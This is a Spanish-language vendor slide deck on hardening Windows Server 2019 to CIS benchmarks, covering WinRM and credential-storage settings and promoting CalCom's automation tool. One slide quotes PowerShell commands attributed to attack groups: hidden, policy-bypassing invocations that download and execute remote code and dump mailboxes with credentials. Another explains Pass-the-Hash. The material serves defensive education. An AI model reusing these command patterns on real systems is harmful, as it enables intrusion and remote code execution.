Este documento presenta soluciones para el proceso de aseguramiento de servidores Windows 2019. Se discuten los estándares CIS y la importancia del cumplimiento, así como el proceso manual de aseguramiento y sus desafíos. También se introduce la automatización de aseguramiento de Calcom para superar estos desafíos mediante la simulación del impacto de políticas, la aplicación de políticas granulares y el monitoreo continuo del cumplimiento.
1. Windows 2019 Hardening
Garantice el cumplimiento de CIS y
evite interrupciones en la producción
Eduardo Rivero
Gerente de Consultoría y Servicios
de Seguridad
Jerry Ludmir
CEO, CalCom Software
Dvir Goren
CTO, CalCom Software
2. Eduardo Rivero
Gerente de Consultoría y Servicios, Securesoft
• Gerente Regional de consultoría y servicios
especializados con más de 17 años de experiencia en
tecnología y seguridad de la información.
• Líder QA de proyectos consultivos de ciberseguridad, y
gestión de respuesta ante incidentes.
• Experto en estándares y normativas de seguridad a
nivel global: ISO 27001/9001, COBIT, SANS, ENISA, PCI,
entre otros.
• Certificado como CRISC, CBCP, LCSPC, SFPC en el rubro.
• En su trayectoria, ha liderado más de 150 proyectos
consultivos de ciberseguridad en los últimos 07 años
3. Jerry Ludmir
CEO, CalCom
• Veterano de la industria de TI, con mas
de 30 años de experiencia en la
industria
• Emprendedor y fundador de grandes
empresas en la industria de TI
• Fundó Calcom hace 15 años
manteniéndose en su rol de liderazgo
Dvir Goren
CTO, CalCom
• Veterano de la industria de TI con mas de 25 años de
experiencia en la industria
• Líder de opinión en el campo del aseguramiento de servidores
con más de 13 años de gestión de proyectos complejos de
fortalecimiento
• Consultor de las organizaciones de seguridad nacional en el
tema del aseguramiento de servidores
• Lidera el equipo de productos de CalCom durante los últimos
15 años, desarrollando la estrategia y roadmap del producto
4. Introducción
• CalCom ofrece soluciones de automatización
para el proceso de aseguramiento en equipos de
seguridad y TI.
• Apoyando grandes organizaciones para lograr el
aseguramiento de su infraestructura por mas de
15 años.
• Hacemos felices tanto a equipos de seguridad
como de TI!
5. Agenda
• Aseguramiento de Servidores – ¿Qué es?
¿Porqué es importante?
• Proceso Manual de Aseguramiento
• Esquemas de Cumplimiento – Acercándonos al
benchmark de CIS
• Escenarios de aseguramiento - lab
• Introducción al enfoque de automatización de
aseguramiento de Calcom
6. Aseguramiento de Servidores – ¿Qué es? ¿Porqué?
• Mejora de la seguridad del servidor a través de una variedad de cambios en la
configuración para reducir la superficie de ataque
• Cumplimiento/auditoría: PCI, FDIC, ciber regulaciones gubernamentales, NIST 800-53
• Prácticas recomendadas de seguridad: eliminación de vulnerabilidades críticas
Servicios Asegurar Ataques
SMBv1 Wannacry
RDP Bluekeep, Dejablue, Ryuk
TLS POODLE
NTLM MTLM Relay
7. Proceso Manual de Aseguramiento
Definir la
política
• Colaboración y aprobación de seguridad, TI, gerencia, auditoría
• Granularidad de políticas: por función del servidor, versión del sistema
operativo, etc.
• Política basada en puntos de referencia conocidos
Prueba de
Laboratorio
• Simular la producción en un entorno de prueba.
• Realizar pruebas para evitar interrumpir la producción.
Asegurando
el Servidor
• Asegurar los entornos de prueba y pre-producción antes de pasar a
producción
• Fortalecimiento del entorno de producción: ¿cómo? (GPO, manualmente,
herramientas)
8. Benchmarks de Cumplimiento - CIS Benchmarks
• Documento de casi 1,000 páginas
• Más de 400 recomendaciones de
aseguramiento
13. Escenario #1: Ataque Malicioso via PowerShell remoto
PowerShell Como Plataforma de Ataque
• Ataques maliciosos con PowerShell crecieron 661% en
2019*
• PowerShell está en todos lados: plataformas de
sistemas operativos, protocolos, aplicaciones, nube etc.
• Interface con .NET y APIs de Windows
• CMD.exe está normalmente bloqueado, pero no
PowerShell
• Ejecuta código en memoria sin tocar el disco
• Descarga y ejecuta código desde otro sistema (Remote
execution attack)
• Una vez el intruso tiene acceso, todas las herramientas
estándar del sistema operativo le están disponibles
• Ataques mas famosos son Petya y NotPetya
*Symantec security Center
14. Attack groups Script invocations
Pupa/ DeepPanda powershell.exe -w hidden -nologo -nointeractive -nop -ep bypass -c “IEX ((new-object
net.webclient). downloadstring([REMOVED]))”
Pupa/ DeepPanda powershell.exe -Win hidden -Enc [REMOVED]
Pupa/ DeepPanda powershell -noprofile -windowstyle hidden -noninteractive -encodedcommand [REMOVED]
SeaDuke powershell -executionpolicy bypass -File diag3.ps1
SeaDuke powershell -windowstyle hidden -ep bypass -f Dump.ps1 -Domain [REMOVED] -User [REMOVED] -
Password [REMOVED] -Mailbox
CozyDuke powershell.exe -WindowStyle hidden -encodedCommand [REMOVED]
Odinaff powershell.exe -NoP -NonI -W Hidden -Enc [REMOVED]
Buckeye powershell.exe -w 1 cls (New-Object Net.WebClient).DownloadFile(“””http://[REMOVED]/
images/rec.exe”””,”””$env:tmprec.exe”””);Iex %tmp%rec.exe
Ejemplos de script usados en ataques dirigidos
• Estos ataques son muy difíciles de detectar por los
equipos de ciberseguridad
• Se ven como actividad normal de usuarios
Escenario #1: Ataque Malicioso via PowerShell remoto
15. Setting: Name Category
Default
Value
2016
CIS 2016
CIS Control
Level (2016)
CIS Control ##
(2016)
Default Value 2019 CIS MS2019
CIS Control
Level (2019)
CIS Control #
(2019)
Allow Basic authentication
WinRM
Client
Disabled L1 18.9.97.1.1
Disabled. (The WinRM client does not use
Basic authentication.)
Disabled L1 18.9.97.1.1
Allow unencrypted traffic
WinRM
Client
Disabled L1 18.9.97.1.2
Disabled. (The WinRM client sends or receives
only encrypted messages over the network.)
Disabled L1 18.9.97.1.2
Disallow Digest authentication
WinRM
Client
Enabled L1 18.9.97.1.3
Disabled. (The WinRM client will use Digest
authentication.)
Enabled L1 18.9.97.1.3
Allow Basic authentication
WinRM
Service
Disabled L1 18.9.97.2.1
Disabled. (The WinRM service will not accept
Basic authentication from a remote client.)
Disabled L1 18.9.97.2.1
Allow remote server management
through WinRM
WinRM
Service
Disabled L2 18.9.97.2.2
Disabled. (The WinRM service will not respond
to requests from a remote computer,
regardless of whether or not any WinRM
listeners are configured.)
Disabled L2 18.9.97.2.2
Allow unencrypted traffic
WinRM
Service
Disabled L1 18.9.97.2.3
Disabled. (The WinRM service sends or
receives only encrypted messages over the
network.)
Disabled L1 18.9.97.2.3
Disallow WinRM from storing RunAs
credentials
WinRM
Service
Enabled L1 18.9.97.2.4
Disabled. (The WinRM service will allow the
RunAsUser and RunAsPassword configuration
values to be set for plug-ins and the
RunAsPassword value will be stored securely.)
Enabled L1 18.9.97.2.4
Allow Remote Shell Access
Windows
Remote Shell
Disabled L2 18.9.98.1
Enabled. (New Remote Shell connections are
allowed.)
Disabled L2 18.9.98.1
Escenario #1: Ataque Malicioso via PowerShell remoto
Recomendaciones de CIS
16. 18.9.97.2.2 (L2) Ensure 'Allow remote server management through WinRM' is set to 'Disabled' (Scored)
• GPO: Computer ConfigurationAdministrative TemplatesWindows ComponentsWindows Remote Management (WinRM)WinRM
ServiceAllow remote server management through WinRM
• Reg: HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsWinRMServiceAllowAutoConfig
Nota:
• Según CIS no hay impacto en el servidor porque es el comportamientos por defecto
• Es correcto solo para servidores recién instalados pero no considera las actividades
administrativas posteriores en el ambiente
Escenario #1: Ataque Malicioso via PowerShell remoto
18. Ejemplos de Comandos:
Invoke-Command -ComputerName win2016iis -Credential chslabdave -ScriptBlock { Get-Culture}
Escenario #1: Ataque Malicioso via PowerShell remoto
19. Buscar en el log de eventos – event id 600:
Nota:
HostApplication=C:Wind
owssystem32wsmprov
host.exe -Embedding
El host de PowerShell
wsmprovhost.exe es un
proceso proxy ejecutado de
forma remota a través de
PowerShell cuando se usa la
Administración Remota de
Windows (WinRM)
Escenario #1: Ataque Malicioso via PowerShell remoto
20. • Pass the Hash es una técnica de ataque que permite a un atacante autenticarse en
un servidor o servicio remoto mediante el uso del hash NTLM o LM de la contraseña
de un usuario.
• Reemplaza la necesidad de robar la contraseña de texto sencillo
• Proceso de ataque:
• Obtiene el hash del nombre de usuario y su contraseña
• Usa el hash (o contraseña) para autenticar el servidor remoto
• Usa LM o NTLM
• No es necesario aplicar fuerza bruta a los hash para obtener el texto de la contraseña sin cifrar
• Debilidad: en el protocolo de autenticación, donde el hash de la contraseña
permanece estático de una sesión a otra hasta que la contraseña se cambie .
• Se puede realizar contra cualquier servidor o servicio que acepte autenticación LM o
NTLM (Windows, Unix o cualquier otro sistema operativo).
Escenario #2: Ataque Pass the Hash
21. 2.3.10.4 (L2) Ensure 'Network access: Do not allow storage of passwords and credentials for network
authentication' is set to 'Enabled' (Scored)
• GPO: Computer ConfigurationPoliciesWindows SettingsSecurity SettingsLocal PoliciesSecurity
OptionsNetwork access: Do not allow storage of passwords and credentials for network
authentication
• Reg: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa:DisableDomainCreds
Escenario #2: Ataque Pass the Hash:
Recomendaciones CIS
23. 2.3.10.4 (L2) Ensure 'Network access: Do not allow storage of passwords and
credentials for network authentication' is set to 'Enabled' (Scored)
Escenario #2: Ataque Pass the Hash:
Recomendaciones CIS
25. CHS – El Proceso de Aseguramiento
MODO APRENDIZAJE
Simula el impacto de la
política en el ambiente de
producción
MODO APLICACIÓN
Aplica las políticas que
endurecen cada servidor
individualmente
MODO MONITOREO
Protege y controla el acceso
en tiempo real
26.
27.
28.
29. CHS de Calcom
• Automatiza el proceso de prueba de
políticas.
• Realiza un análisis de impacto de
políticas directamente en el ambiente
de producción
• Aplica una política granular por
servidor / versión / rol
• Garantiza el cumplimiento continuo
30. Contacte a CalCom
Estamos aquí para ayudarlos con su proyecto de
aseguramiento!
Contáctenos vía:
Email:
info@calcomsoftware.com
Página web de CalCom:
www.calcomsoftware.com